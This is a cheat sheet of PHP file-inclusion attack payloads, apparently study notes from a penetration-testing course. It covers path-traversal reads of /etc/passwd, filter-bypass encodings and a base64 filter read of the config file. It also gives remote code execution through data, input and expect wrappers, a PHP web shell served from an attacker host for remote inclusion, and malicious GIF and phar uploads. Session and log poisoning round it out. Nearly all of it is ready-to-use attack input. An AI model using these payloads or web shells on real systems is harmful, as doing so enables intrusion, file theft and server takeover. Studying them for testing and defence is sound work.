#localfileinclusion
##BasicLFI
###Basic LFI
/index.php?language=/etc/passwd
###LFI with path traversal
/index.php?language=../../../../etc/passwd
###LFI with name prefix
/index.php?language=/../../../etc/passwd
###LFI with approved path
/index.php?language=./languages/../../../../etc/passwd
##LFI Bypasses
###Bypass basic path traversal filter
/index.php?language=....//....//....//....//etc/passwd
###Bypass filters with URL encoding
/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
###Bypass appended extension with path truncation (obsolete)
/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]
###Read PHP with base64 filter
/index.php?language=php://filter/read=convert.base64-encode/resource=config
#remotecodeexecution
##PHPWrappers
###RCE with data wrapper
/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
###RCE with input wrapper
 curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"
###RCE with expect wrapper
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
##RFI
###Host web shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>
###Include remote PHP web shell
/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id
##LFI+Upload
###Create malicious image
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
###RCE with malicious uploaded image
/index.php?language=./profile_images/shell.gif&cmd=id
###Create malicious phar 'as jpg'
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
###RCE with malicious uploaded phar
/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
##logPoisoning
###Read PHP session parameters
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
###Poison PHP session with web shell
/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
###RCE through poisoned PHP session
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
###Poison server log
curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'
###RCE through poisoned PHP session
/index.php?language=/var/log/apache2/access.log&cmd=id

















